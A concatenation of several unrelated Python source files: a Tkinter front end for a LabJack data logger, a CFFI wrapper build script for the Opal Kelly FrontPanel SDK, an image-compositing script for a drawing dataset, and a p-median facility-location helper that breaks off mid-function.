self.setup_control(parent=ctrl_frame)
plt_frame = ttk.Frame(self)
self.configure_grid(plt_frame, row=3, column=0)
self.setup_plot(parent=plt_frame)
# set min size
min_colsize = self.plot.figure.get_figwidth() * self.plot.figure.dpi
min_rowsize = self.plot.figure.get_figheight() * self.plot.figure.dpi
self.grid_columnconfigure(0, weight=1, minsize=min_colsize)
self.grid_rowconfigure(3, weight=1, minsize=min_rowsize)
def setup_labjack_settings(self, parent=None):
if parent is None:
parent = self
parent.grid_columnconfigure(0, weight=1)
parent.grid_columnconfigure(1, weight=1)
# resolution
lbl = ttk.Label(text="Resolution:")
v = self.add_variable("resolution", tk.StringVar())
cob = self.add_widget("resolution", ttk.Combobox(
parent, state="readonly", textvariable=v
))
cob["values"] = range(13)
cob.current(12)
cob.bind("<<ComboboxSelected>>", self.update_resolution)
cob.grid(row=0, column=0)
# gain
v = self.add_variable("gain", tk.StringVar())
cob = self.add_widget("gain", ttk.Combobox(
parent, state="readonly", textvariable=v
))
gains = sorted(self.GAIN_INDEXES, key=self.GAIN_INDEXES.get)
cob["values"] = gains
cob.current(gains.index("x100"))
cob.bind("<<ComboboxSelected>>", self.update_gain)
cob.grid(row=0, column=1)
def setup_labjack_ports(self, parent=None):
if parent is None:
parent = self
parent.grid_columnconfigure(0, weight=1)
parent.grid_columnconfigure(1, weight=1)
# add ains
ain_frm = ttk.Frame(parent)
self.configure_grid(ain_frm, row=0, column=0)
lbl = ttk.Label(ain_frm, text="Analog Inputs")
self.configure_grid(lbl, sticky="n", row=0, column=0)
for ain in range(14):
row = ain % 5
column = ain // 5
w = self.new_ain_widget(ain, parent=ain_frm)
self.configure_grid(w, sticky="w", row=row+1, column=column)
self.configure_column(ain_frm, [0, 1, 2])
# add mios
dio_frm = ttk.Frame(parent)
self.configure_grid(dio_frm, row=0, column=1)
self.configure_column(dio_frm, [0, 1, 2])
lbl = ttk.Label(dio_frm, text="Digital I/O")
self.configure_grid(lbl, sticky="nw", row=0, column=0)
for dio in range(20):
row = dio % 5
column = dio // 5
w = self.new_dio_widget(dio, parent=dio_frm)
self.configure_grid(w, sticky="w", row=row+1, column=column)
def new_ain_widget(self, ain, parent=None):
if parent is None:
parent = self
name = "ain_%s" % ain
v = self.add_variable(name, tk.IntVar())
cb = ttk.Checkbutton(
parent, text=name.upper(), command=lambda: self.toggle_ain(ain),
variable=v
)
return self.add_widget(name, cb)
def new_dio_widget(self, dio, parent=None):
if parent is None:
parent = self
name = "dio_%s" % dio
v = self.add_variable(name, tk.IntVar())
cb = ttk.Checkbutton(
parent, text=name.upper(), command=lambda: self.toggle_dio(dio),
variable=v
)
return self.add_widget(name, cb)
def setup_plot(self, parent=None):
if parent is None:
parent = self
self.add_widget("add_plot", LabJackPlotFrame(parent))
self.plot.setup()
self.configure_grid(self.plot, row=3, column=0, columnspan=2)
self.plot.grid_columnconfigure(0, weight=1)
self.plot.grid_rowconfigure(0, weight=1)
parent.grid_columnconfigure(0, weight=1)
parent.grid_rowconfigure(0, weight=1)
def setup_control(self, parent=None):
if parent is None:
parent = self
parent.grid_columnconfigure(0, weight=1)
parent.grid_columnconfigure(1, weight=1)
parent.grid_columnconfigure(2, weight=1)
self.widgets["start"] = ttk.Button(
parent, text="Record", command=self.start_update,
state="normal"
)
self.widgets["start"].grid(row=0, column=0)
self.widgets["pause"] = ttk.Button(
parent, text="Pause", command=self.pause_update,
state="disabled"
)
self.widgets["pause"].grid(row=0, column=1)
self.widgets["reset"] = ttk.Button(
parent, text="Reset", command=self.reset_plot,
state="normal"
)
self.widgets["reset"].grid(row=0, column=2)
v = self.add_variable("status", tk.StringVar())
status = ttk.Label(
parent, textvariable=v,
)
status.grid(row=1, column=0, columnspan=3)
# refresh rate
self.setup_rate(parent)
def setup_rate(self, parent=None):
if parent is None:
parent = self
label = ttk.Label(parent, text="Refresh rate:")
label.grid(row=2, column=0)
v = self.add_variable("refresh_rate", tk.StringVar())
cob = ttk.Combobox(
parent, state="readonly", textvariable=v
)
self.add_widget("refresh_rate", cob)
rates = sorted(self.REFRESH_RATES, key=self.REFRESH_RATES.get)
cob["values"] = rates
cob.current(rates.index("1 sec"))
cob.bind("<<ComboboxSelected>>", self.update_rate)
cob.grid(row=2, column=1)
def reset_plot(self):
self.controller.reset_plot()
def start_update(self):
if self.controller.start_update():
self.get_widget("start")["state"] = "disabled"
self.get_widget("pause")["state"] = "normal"
def pause_update(self):
if self.controller.stop_update():
self.get_widget("pause")["state"] = "disabled"
self.get_widget("start")["state"] = "normal"
def update_rate(self, event):
self.controller.update_interval = self.refresh_rate
def update_resolution(self, event):
self.controller.update_resolution(self.resolution)
def update_gain(self, event):
self.controller.update_gain(self.gain)
def toggle_ain(self, ain):
name = "ain_%s" % ain
v = self.get_variable(name)
self.controller.toggle_ain(ain, v.get())
def toggle_dio(self, dio):
name = "dio_%s" % dio
v = self.get_variable(name)
self.controller.toggle_dio(dio, v.get())
``` |
{
"source": "jjongbloets/pyOKFrontPanel",
"score": 2
} |
#### File: pyOKFrontPanel/okfrontpanel/wrapper_build.py
```python
import sys
import os
import struct
extra_dirs = {}
include_dirs = []
library_dirs = []
bits = struct.calcsize("P") * 8
if sys.platform == 'win32':
arch = 'x64' if bits == 64 else 'Win32'
okpath = os.environ['OKFP_SDK']
include_dirs.append(os.path.join(okpath, 'include'))
library_dirs.append(os.path.join(okpath, 'lib', arch))
extra_dirs.update({
'include_dirs': include_dirs,
'library_dirs': library_dirs
})
#
# CFFI
#
import cffi
ffibuilder = cffi.FFI()
ffibuilder.set_source(
"okfrontpanel._wrapper",
"""
#include <stdint.h>
#include <okFrontPanelDLL.h>
""",
libraries=['okFrontPanel'],
**extra_dirs
)
ffibuilder.cdef("""
#define TRUE ...
#define FALSE ...
#define OK_MAX_DEVICEID_LENGTH ... // 32-byte content + NULL termination
#define OK_MAX_SERIALNUMBER_LENGTH ... // 10-byte content + NULL termination
#define OK_MAX_PRODUCT_NAME_LENGTH ... // 127-byte content + NULL termination
#define OK_MAX_BOARD_MODEL_STRING_LENGTH ...
// ok_USBSpeed types
#define OK_USBSPEED_UNKNOWN ...
#define OK_USBSPEED_FULL ...
#define OK_USBSPEED_HIGH ...
#define OK_USBSPEED_SUPER ...
// ok_Interface types
#define OK_INTERFACE_UNKNOWN ...
#define OK_INTERFACE_USB2 ...
#define OK_INTERFACE_PCIE ...
#define OK_INTERFACE_USB3 ...
#define OK_PRODUCT_OEM_START ...
typedef int Bool;
typedef char okBool;
typedef char const * okFP_dll_pchar;
typedef enum {
ok_FPGAConfigurationMethod_NVRAM = 0,
ok_FPGAConfigurationMethod_JTAG = 1
} ok_FPGAConfigurationMethod;
typedef enum {
ok_ClkSrc22150_Ref = 0,
ok_ClkSrc22150_Div1ByN = 1,
ok_ClkSrc22150_Div1By2 = 2,
ok_ClkSrc22150_Div1By3 = 3,
ok_ClkSrc22150_Div2ByN = 4,
ok_ClkSrc22150_Div2By2 = 5,
ok_ClkSrc22150_Div2By4 = 6
} ok_ClockSource_22150;
typedef enum {
ok_ClkSrc22393_Ref = 0,
ok_ClkSrc22393_PLL0_0 = 2,
ok_ClkSrc22393_PLL0_180 = 3,
ok_ClkSrc22393_PLL1_0 = 4,
ok_ClkSrc22393_PLL1_180 = 5,
ok_ClkSrc22393_PLL2_0 = 6,
ok_ClkSrc22393_PLL2_180 = 7
} ok_ClockSource_22393;
typedef enum {
ok_DivSrc_Ref = 0,
ok_DivSrc_VCO = 1
} ok_DividerSource;
typedef enum {
ok_brdUnknown = 0,
ok_brdXEM3001v1 = 1,
ok_brdXEM3001v2 = 2,
ok_brdXEM3010 = 3,
ok_brdXEM3005 = 4,
ok_brdXEM3001CL = 5,
ok_brdXEM3020 = 6,
ok_brdXEM3050 = 7,
ok_brdXEM9002 = 8,
ok_brdXEM3001RB = 9,
ok_brdXEM5010 = 10,
ok_brdXEM6110LX45 = 11,
ok_brdXEM6110LX150 = 15,
ok_brdXEM6001 = 12,
ok_brdXEM6010LX45 = 13,
ok_brdXEM6010LX150 = 14,
ok_brdXEM6006LX9 = 16,
ok_brdXEM6006LX16 = 17,
ok_brdXEM6006LX25 = 18,
ok_brdXEM5010LX110 = 19,
ok_brdZEM4310 = 20,
ok_brdXEM6310LX45 = 21,
ok_brdXEM6310LX150 = 22,
ok_brdXEM6110v2LX45 = 23,
ok_brdXEM6110v2LX150 = 24,
ok_brdXEM6002LX9 = 25,
ok_brdXEM6310MTLX45T = 26,
ok_brdXEM6320LX130T = 27,
ok_brdXEM7350K70T = 28,
ok_brdXEM7350K160T = 29,
ok_brdXEM7350K410T = 30,
ok_brdXEM6310MTLX150T = 31,
ok_brdZEM5305A2 = 32,
ok_brdZEM5305A7 = 33,
ok_brdXEM7001A15 = 34,
ok_brdXEM7001A35 = 35,
ok_brdXEM7360K160T = 36,
ok_brdXEM7360K410T = 37,
ok_brdZEM5310A4 = 38,
ok_brdZEM5310A7 = 39,
ok_brdZEM5370A5 = 40,
ok_brdXEM7010A50 = 41,
ok_brdXEM7010A200 = 42,
ok_brdXEM7310A75 = 43,
ok_brdXEM7310A200 = 44
} ok_BoardModel;
// Errors
typedef enum {
ok_NoError = 0,
ok_Failed = -1,
ok_Timeout = -2,
ok_DoneNotHigh = -3,
ok_TransferError = -4,
ok_CommunicationError = -5,
ok_InvalidBitstream = -6,
ok_FileError = -7,
ok_DeviceNotOpen = -8,
ok_InvalidEndpoint = -9,
ok_InvalidBlockSize = -10,
ok_I2CRestrictedAddress = -11,
ok_I2CBitError = -12,
ok_I2CNack = -13,
ok_I2CUnknownStatus = -14,
ok_UnsupportedFeature = -15,
ok_FIFOUnderflow = -16,
ok_FIFOOverflow = -17,
ok_DataAlignmentError = -18,
ok_InvalidResetProfile = -19,
ok_InvalidParameter = -20
} ok_ErrorCode;
typedef struct {...;} okTRegisterEntry;
typedef struct {...;} okTTriggerEntry;
typedef struct {...;} okTFPGAResetProfile;
typedef struct {...;} okTFlashLayout;
typedef struct {...;} okTDeviceInfo;
typedef struct {...;} okTDeviceMatchInfo;
typedef struct {...;} okTDeviceSensor;
typedef void* okPLL22150_HANDLE;
typedef void* okPLL22393_HANDLE;
typedef void* okFrontPanel_HANDLE;
typedef struct okDeviceSensorsHandle* okDeviceSensors_HANDLE;
typedef struct okDeviceSettingsHandle* okDeviceSettings_HANDLE;
typedef struct okFirmwareHandle* okFirmware_HANDLE;
typedef struct okFirmwarePackageHandle* okFirmwarePackage_HANDLE;
typedef struct okFrontPanelManagerHandle* okFrontPanelManager_HANDLE;
typedef struct okCFrontPanelManagerHandle* okCFrontPanelManager_HANDLE;
typedef struct okCFrontPanelDevicesHandle* okCFrontPanelDevices_HANDLE;
typedef void (*okFirmware_PerformTasks_Callback)(void*, int, const char*);
// General
//
void okFrontPanelDLL_GetVersion(char *date, char *time);
// okPLL22393
//
okPLL22393_HANDLE okPLL22393_Construct();
void okPLL22393_Destruct(okPLL22393_HANDLE pll);
void okPLL22393_SetCrystalLoad(okPLL22393_HANDLE pll, double capload);
void okPLL22393_SetReference(okPLL22393_HANDLE pll, double freq);
double okPLL22393_GetReference(okPLL22393_HANDLE pll);
Bool okPLL22393_SetPLLParameters(okPLL22393_HANDLE pll, int n, int p, int q, Bool enable);
Bool okPLL22393_SetPLLLF(okPLL22393_HANDLE pll, int n, int lf);
Bool okPLL22393_SetOutputDivider(okPLL22393_HANDLE pll, int n, int div);
Bool okPLL22393_SetOutputSource(okPLL22393_HANDLE pll, int n, ok_ClockSource_22393 clksrc);
void okPLL22393_SetOutputEnable(okPLL22393_HANDLE pll, int n, Bool enable);
int okPLL22393_GetPLLP(okPLL22393_HANDLE pll, int n);
int okPLL22393_GetPLLQ(okPLL22393_HANDLE pll, int n);
double okPLL22393_GetPLLFrequency(okPLL22393_HANDLE pll, int n);
int okPLL22393_GetOutputDivider(okPLL22393_HANDLE pll, int n);
ok_ClockSource_22393 okPLL22393_GetOutputSource(okPLL22393_HANDLE pll, int n);
double okPLL22393_GetOutputFrequency(okPLL22393_HANDLE pll, int n);
Bool okPLL22393_IsOutputEnabled(okPLL22393_HANDLE pll, int n);
Bool okPLL22393_IsPLLEnabled(okPLL22393_HANDLE pll, int n);
void okPLL22393_InitFromProgrammingInfo(okPLL22393_HANDLE pll, unsigned char *buf);
void okPLL22393_GetProgrammingInfo(okPLL22393_HANDLE pll, unsigned char *buf);
// okPLL22150
//
okPLL22150_HANDLE okPLL22150_Construct();
void okPLL22150_Destruct(okPLL22150_HANDLE pll);
void okPLL22150_SetCrystalLoad(okPLL22150_HANDLE pll, double capload);
void okPLL22150_SetReference(okPLL22150_HANDLE pll, double freq, Bool extosc);
double okPLL22150_GetReference(okPLL22150_HANDLE pll);
Bool okPLL22150_SetVCOParameters(okPLL22150_HANDLE pll, int p, int q);
int okPLL22150_GetVCOP(okPLL22150_HANDLE pll);
int okPLL22150_GetVCOQ(okPLL22150_HANDLE pll);
double okPLL22150_GetVCOFrequency(okPLL22150_HANDLE pll);
void okPLL22150_SetDiv1(okPLL22150_HANDLE pll, ok_DividerSource divsrc, int n);
void okPLL22150_SetDiv2(okPLL22150_HANDLE pll, ok_DividerSource divsrc, int n);
ok_DividerSource okPLL22150_GetDiv1Source(okPLL22150_HANDLE pll);
ok_DividerSource okPLL22150_GetDiv2Source(okPLL22150_HANDLE pll);
int okPLL22150_GetDiv1Divider(okPLL22150_HANDLE pll);
int okPLL22150_GetDiv2Divider(okPLL22150_HANDLE pll);
void okPLL22150_SetOutputSource(okPLL22150_HANDLE pll, int output, ok_ClockSource_22150 clksrc);
void okPLL22150_SetOutputEnable(okPLL22150_HANDLE pll, int output, Bool enable);
ok_ClockSource_22150 okPLL22150_GetOutputSource(okPLL22150_HANDLE pll, int output);
double okPLL22150_GetOutputFrequency(okPLL22150_HANDLE pll, int output);
Bool okPLL22150_IsOutputEnabled(okPLL22150_HANDLE pll, int output);
void okPLL22150_InitFromProgrammingInfo(okPLL22150_HANDLE pll, unsigned char *buf);
void okPLL22150_GetProgrammingInfo(okPLL22150_HANDLE pll, unsigned char *buf);
// okDeviceSensors
//
okDeviceSensors_HANDLE okDeviceSensors_Construct();
void okDeviceSensors_Destruct(okDeviceSensors_HANDLE hnd);
int okDeviceSensors_GetSensorCount(okDeviceSensors_HANDLE hnd);
okTDeviceSensor okDeviceSensors_GetSensor(okDeviceSensors_HANDLE hnd, int n);
// okDeviceSettings
//
okDeviceSettings_HANDLE okDeviceSettings_Construct();
void okDeviceSettings_Destruct(okDeviceSettings_HANDLE hnd);
ok_ErrorCode okDeviceSettings_GetString(okDeviceSettings_HANDLE hnd, const char *key, int length, char *buf);
ok_ErrorCode okDeviceSettings_SetString(okDeviceSettings_HANDLE hnd, const char *key, const char *buf);
ok_ErrorCode okDeviceSettings_GetInt(okDeviceSettings_HANDLE hnd, const char *key, uint32_t *value);
ok_ErrorCode okDeviceSettings_SetInt(okDeviceSettings_HANDLE hnd, const char *key, uint32_t value);
ok_ErrorCode okDeviceSettings_Delete(okDeviceSettings_HANDLE hnd, const char *key);
ok_ErrorCode okDeviceSettings_Save(okDeviceSettings_HANDLE hnd);
// okFirmware and okFirmwarePackage
//
okFirmwarePackage_HANDLE okFirmwarePackage_Load(const char *filename);
void okFirmwarePackage_Destruct(okFirmwarePackage_HANDLE hnd);
int okFirmwarePackage_GetFirmwareCount(okFirmwarePackage_HANDLE hnd);
okFirmware_HANDLE okFirmwarePackage_GetFirmware(okFirmwarePackage_HANDLE hnd, int num);
ok_ErrorCode okFirmware_PerformTasks(okFirmware_HANDLE hnd, const char *serial, okFirmware_PerformTasks_Callback callback, void *arg);
// okFrontPanel
//
okFrontPanel_HANDLE okFrontPanel_Construct();
void okFrontPanel_Destruct(okFrontPanel_HANDLE hnd);
int okFrontPanel_GetErrorString(int ec, char *buf, int length);
ok_ErrorCode okFrontPanel_AddCustomDevice(const okTDeviceMatchInfo* matchInfo, const okTDeviceInfo* devInfo);
ok_ErrorCode okFrontPanel_RemoveCustomDevice(int productID);
ok_ErrorCode okFrontPanel_WriteI2C(okFrontPanel_HANDLE hnd, const int addr, int length, unsigned char *data);
ok_ErrorCode okFrontPanel_ReadI2C(okFrontPanel_HANDLE hnd, const int addr, int length, unsigned char *data);
ok_ErrorCode okFrontPanel_FlashEraseSector(okFrontPanel_HANDLE hnd, uint32_t address);
ok_ErrorCode okFrontPanel_FlashWrite(okFrontPanel_HANDLE hnd, uint32_t address, uint32_t length, const uint8_t *buf);
ok_ErrorCode okFrontPanel_FlashRead(okFrontPanel_HANDLE hnd, uint32_t address, uint32_t length, uint8_t *buf);
ok_ErrorCode okFrontPanel_GetFPGAResetProfile(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, okTFPGAResetProfile *profile);
ok_ErrorCode okFrontPanel_GetFPGAResetProfileWithSize(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, okTFPGAResetProfile *profile, unsigned size);
ok_ErrorCode okFrontPanel_SetFPGAResetProfile(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, const okTFPGAResetProfile *profile);
ok_ErrorCode okFrontPanel_SetFPGAResetProfileWithSize(okFrontPanel_HANDLE hnd, ok_FPGAConfigurationMethod method, const okTFPGAResetProfile *profile, unsigned size);
ok_ErrorCode okFrontPanel_ReadRegister(okFrontPanel_HANDLE hnd, uint32_t addr, uint32_t *data);
ok_ErrorCode okFrontPanel_ReadRegisters(okFrontPanel_HANDLE hnd, unsigned num, okTRegisterEntry* regs);
ok_ErrorCode okFrontPanel_WriteRegister(okFrontPanel_HANDLE hnd, uint32_t addr, uint32_t data);
ok_ErrorCode okFrontPanel_WriteRegisters(okFrontPanel_HANDLE hnd, unsigned num, const okTRegisterEntry* regs);
int okFrontPanel_GetHostInterfaceWidth(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsHighSpeed(okFrontPanel_HANDLE hnd);
ok_BoardModel okFrontPanel_GetBoardModel(okFrontPanel_HANDLE hnd);
void okFrontPanel_GetBoardModelString(okFrontPanel_HANDLE hnd, ok_BoardModel m, char *buf);
int okFrontPanel_GetDeviceCount(okFrontPanel_HANDLE hnd);
ok_BoardModel okFrontPanel_GetDeviceListModel(okFrontPanel_HANDLE hnd, int num);
void okFrontPanel_GetDeviceListSerial(okFrontPanel_HANDLE hnd, int num, char *buf);
ok_ErrorCode okFrontPanel_OpenBySerial(okFrontPanel_HANDLE hnd, const char *serial);
Bool okFrontPanel_IsOpen(okFrontPanel_HANDLE hnd);
void okFrontPanel_EnableAsynchronousTransfers(okFrontPanel_HANDLE hnd, Bool enable);
ok_ErrorCode okFrontPanel_SetBTPipePollingInterval(okFrontPanel_HANDLE hnd, int interval);
void okFrontPanel_SetTimeout(okFrontPanel_HANDLE hnd, int timeout);
int okFrontPanel_GetDeviceMajorVersion(okFrontPanel_HANDLE hnd);
int okFrontPanel_GetDeviceMinorVersion(okFrontPanel_HANDLE hnd);
ok_ErrorCode okFrontPanel_ResetFPGA(okFrontPanel_HANDLE hnd);
void okFrontPanel_Close(okFrontPanel_HANDLE hnd);
void okFrontPanel_GetSerialNumber(okFrontPanel_HANDLE hnd, char *buf);
ok_ErrorCode okFrontPanel_GetDeviceSensors(okFrontPanel_HANDLE hnd, okDeviceSensors_HANDLE settings);
ok_ErrorCode okFrontPanel_GetDeviceSettings(okFrontPanel_HANDLE hnd, okDeviceSettings_HANDLE settings);
ok_ErrorCode okFrontPanel_GetDeviceInfo(okFrontPanel_HANDLE hnd, okTDeviceInfo *info);
ok_ErrorCode okFrontPanel_GetDeviceInfoWithSize(okFrontPanel_HANDLE hnd, okTDeviceInfo *info, unsigned size);
void okFrontPanel_GetDeviceID(okFrontPanel_HANDLE hnd, char *buf);
void okFrontPanel_SetDeviceID(okFrontPanel_HANDLE hnd, const char *strID);
ok_ErrorCode okFrontPanel_ConfigureFPGA(okFrontPanel_HANDLE hnd, const char *strFilename);
ok_ErrorCode okFrontPanel_ConfigureFPGAWithReset(okFrontPanel_HANDLE hnd, const char *strFilename, const okTFPGAResetProfile *reset);
ok_ErrorCode okFrontPanel_ConfigureFPGAFromMemory(okFrontPanel_HANDLE hnd, unsigned char *data, unsigned long length);
ok_ErrorCode okFrontPanel_ConfigureFPGAFromMemoryWithReset(okFrontPanel_HANDLE hnd, unsigned char *data, unsigned long length, const okTFPGAResetProfile *reset);
ok_ErrorCode okFrontPanel_ConfigureFPGAFromFlash(okFrontPanel_HANDLE hnd, unsigned long configIndex);
ok_ErrorCode okFrontPanel_GetPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_SetPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_GetEepromPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_SetEepromPLL22150Configuration(okFrontPanel_HANDLE hnd, okPLL22150_HANDLE pll);
ok_ErrorCode okFrontPanel_GetPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_SetPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_GetEepromPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_SetEepromPLL22393Configuration(okFrontPanel_HANDLE hnd, okPLL22393_HANDLE pll);
ok_ErrorCode okFrontPanel_LoadDefaultPLLConfiguration(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsFrontPanelEnabled(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsFrontPanel3Supported(okFrontPanel_HANDLE hnd);
void okFrontPanel_UpdateWireIns(okFrontPanel_HANDLE hnd);
ok_ErrorCode okFrontPanel_GetWireInValue(okFrontPanel_HANDLE hnd, int epAddr, uint32_t *val);
ok_ErrorCode okFrontPanel_SetWireInValue(okFrontPanel_HANDLE hnd, int ep, unsigned long val, unsigned long mask);
void okFrontPanel_UpdateWireOuts(okFrontPanel_HANDLE hnd);
unsigned long okFrontPanel_GetWireOutValue(okFrontPanel_HANDLE hnd, int epAddr);
ok_ErrorCode okFrontPanel_ActivateTriggerIn(okFrontPanel_HANDLE hnd, int epAddr, int bit);
void okFrontPanel_UpdateTriggerOuts(okFrontPanel_HANDLE hnd);
Bool okFrontPanel_IsTriggered(okFrontPanel_HANDLE hnd, int epAddr, unsigned long mask);
long okFrontPanel_GetLastTransferLength(okFrontPanel_HANDLE hnd);
long okFrontPanel_WriteToPipeIn(okFrontPanel_HANDLE hnd, int epAddr, long length, unsigned char *data);
long okFrontPanel_ReadFromPipeOut(okFrontPanel_HANDLE hnd, int epAddr, long length, unsigned char *data);
long okFrontPanel_WriteToBlockPipeIn(okFrontPanel_HANDLE hnd, int epAddr, int blockSize, long length, unsigned char *data);
long okFrontPanel_ReadFromBlockPipeOut(okFrontPanel_HANDLE hnd, int epAddr, int blockSize, long length, unsigned char *data);
// okFrontPanelManager
//
okCFrontPanelManager_HANDLE okFrontPanelManager_Construct(okFrontPanelManager_HANDLE self, const char* realm);
void okFrontPanelManager_Destruct(okCFrontPanelManager_HANDLE hnd);
ok_ErrorCode okFrontPanelManager_StartMonitoring(okCFrontPanelManager_HANDLE hnd);
okFrontPanel_HANDLE okFrontPanelManager_Open(okCFrontPanelManager_HANDLE hnd, const char *serial);
// FrontPanelDevices
//
okCFrontPanelDevices_HANDLE okFrontPanelDevices_Construct(const char* realm);
void okFrontPanelDevices_Destruct(okCFrontPanelDevices_HANDLE hnd);
int okFrontPanelDevices_GetCount(okCFrontPanelDevices_HANDLE hnd);
void okFrontPanelDevices_GetSerial(okCFrontPanelDevices_HANDLE hnd, int num, char* buf);
okFrontPanel_HANDLE okFrontPanelDevices_Open(okCFrontPanelDevices_HANDLE hnd, const char* serial);
""")
if __name__ == "__main__":
ffibuilder.compile(verbose=True)
``` |
{
"source": "JJongSue/fastrnn",
"score": 3
} |
#### File: JJongSue/fastrnn/npy2txt.py
```python
import matplotlib.pylab as plt
import numpy as np
from PIL import Image
import random
import json
from collections import OrderedDict
MAX_X = 1200
MAX_Y = 720
'''
npy 파일을 txt파일 변환하는 코드
'''
NPY_FOLDER = 'npyfiles/'
SAVE_FOLDER = 'data'
def pasta_img(origin_img, num_i):
sizex = random.randint(28, 700)
sizey = random.randint(28, 700)
x = random.randint(0, MAX_X-sizex)
y = random.randint(0, MAX_Y-sizey)
i = num_i.reshape(28,28)
im = Image.fromarray(i)
resize_image = im.resize((sizex,sizey))
new_img.paste(resize_image, (x,y, x+sizex, y+sizey))
return x,y, sizex, sizey
'''
이미지 resize나 이미지 합성을 확인하기 위한 코드
'''
nps = np.load(NPY_FOLDER+'house.npy')
file_data = OrderedDict()
f = open("house.txt", 'w')
print(nps[0])
for i in range(1000):
cnt = random.randint(1,3)
file_name = str(i) + '.jpg'
new_img = Image.new("RGB", (MAX_X, MAX_Y))
for j in range(cnt):
randomi = random.randint(1, len(nps))
x, y, sizex, sizey = pasta_img(new_img, nps[randomi])
inputstr = (SAVE_FOLDER+"/"+file_name)+","+str(x)+","+str(y)+","+str(x+sizex)+","+str(y+sizey)+",house\n"
f.write(inputstr)
new_img.save(SAVE_FOLDER+"/"+file_name)
# file_data[file_name] = inputd
# with open(SAVE_FOLDER+'/train/via_region_data.json', 'w', encoding='utf-8') as make_file:
# json.dump(file_data, make_file, ensure_ascii=False, indent="\t")
# file_data = OrderedDict()
# for i in range(8, 10):
# file_name = str(i) + '.jpg'
# new_img = Image.new("RGB", (MAX_X, MAX_Y))
# x, y, sizex, sizey = pasta_img(new_img, nps[i])
# new_img.save(SAVE_FOLDER+"/"+"val/"+file_name)
# inputd = OrderedDict()
# inputd['fileref'] = ""
# inputd['filename'] = file_name
# inputd['base64_img_data'] = ""
# inputd['file_attributes'] = OrderedDict()
# inputd['regions'] = {
# "0":{
# "shape_attributes": {
# "name": "polygon",
# 'all_points_x': [x, x+sizex, x+sizex, x],
# 'all_points_y': [y, y, y+sizey, y+sizey]},
# # "x": x,
# # "y": y,
# # "width": sizex,
# # "height": sizey},
# "region_attributes": {}
# }
# }
# file_data[file_name] = inputd
# with open(SAVE_FOLDER+'/val/via_region_data.json', 'w', encoding='utf-8') as make_file:
# json.dump(file_data, make_file, ensure_ascii=False, indent="\t")
# cnt = 1
# for i in nps:
# new_img = Image.new("RGB", (1200, 720))
# pasta_img(new_img,
# # im.show()
# # im.save('eye.bmp')
# if cnt == 10:
# break
``` |
{
"source": "jjonhwa/Policy-to-utilize-DT-in-traditional-markets",
"score": 3
} |
#### File: Policy-to-utilize-DT-in-traditional-markets/pmedian/pmedian.py
```python
import pandas as pd
import folium
import math
from itertools import combinations
from pyproj import Proj, transform
from tqdm import tqdm
from typing import List
def preprocess_data(path: str) -> pd.DataFrame:
"""
"Note": Modify and use according to your own data.
Or you don't need to use this code, and you just insert some code about preprocess in "main"
Explanation
Data Path is received as inputs and data is purified in the order of "name"/"latitude"/"longitude".
Arguments
path: A path of a file in the form of 'xlsx' and 'csv' is input.
Return
Pandas Data Frame: Form of Pandas Data Frame with Column in the order of "Name", "Latitude", and "Longitude"
"""
if "xlsx" in path:
data = pd.read_excel(path)
############ Modify according to input/output ####################
if "대구분명칭" in data.columns:
data = data[["대구분명칭", "위도", "경도"]]
elif "시장명" in data.columns:
data = data[["시장명", "위도", "경도"]]
data.columns = ["name", "latitude", "longitude"]
##########################################################
elif "csv" in path:
data = pd.read_csv(
path, header=None
) # Header options are also modified according to your data.
############ Modify according to input/output ####################
data.columns = ["longitude", "latitude", "name"]
data = data[["name", "latitude", "longitude"]]
##########################################################
return data
def coordinate_change(data: pd.DataFrame, c1: str, c2: str) -> pd.DataFrame:
"""
Explanation
The latitude and longitude existing in the data frame are converted from the coordinate c1 to the coordinate c2 to be converted.
Arguments
data: The columns are in the form of a Pandas Data Frame in the order of "name", "latitude", and "longitude".
c1: The original latitude and longitude coordinate system.
c2: The latitude and longitude coordinate system to convert.
c1 & c2: something like 'epsg:5178', 'epsg:4326', etc..
Return
Pandas Data Frame: Data frame with converted latitude and longitude coordinates.
"""
proj_c1 = Proj(init=c1)
proj_c2 = Proj(init=c2)
for i in tqdm(range(len(data))):
change_long, change_lat = transform(
proj_c1, proj_c2, data["longitude"][i], data["latitude"][i]
)
data["longitude"][i] = change_long
data["latitude"][i] = change_lat
return data
def shortest_distance(F: pd.DataFrame, L: pd.DataFrame):
"""
Explanation
Create the shortest matrix between public facilities and floating population.
Arguments
F: Coordinates of public facilities.
L: Coordinates of the floating population.
Return
Pandas Data Frame: Shortest distance matrix between public facilities and floating population
"""
F_list = []
L_list = []
for i in range(len(F)):
name = f"F_{i}"
F_list.append(name)
for i in range(len(L)):
name = f"L_{i}"
L_list.append(name)
distance = pd.DataFrame(columns=F_list, index=L_list)
for i in range(len(distance)):
for j, col in enumerate(distance.columns):
square_sum = ((F["latitude"][j] - L["latitude"][i]) ** 2) + (
(F["longitude"][j] - L["longitude"][i]) ** 2
)
dist = math.sqrt(square_sum)
distance[col][i] = dist
return distance
def p_list_set(distance_data: pd.DataFrame, p: int) -> List[List]:
"""
Explanation
Based on F(Public Facilities), '2p' public facilities with the shortest
distance from the floating population coordinates are selected
Args
distance_data: The matrix of distances between F and L. (column = F, row = L)
p: The number of public facilities to be finally selected.
return
p_list_set: A set of p lists tied up in p
ex) candidate= [1,2,3,4,5,6,7,8,9,10] / p=3
p_list_set = [
[1,2,3],
[2,3,4],
[3,4,5]
]
"""
# The sum of the distances between the coordinates of the floating population for public facilities.
col_sum = list(distance_data.sum(axis=0))
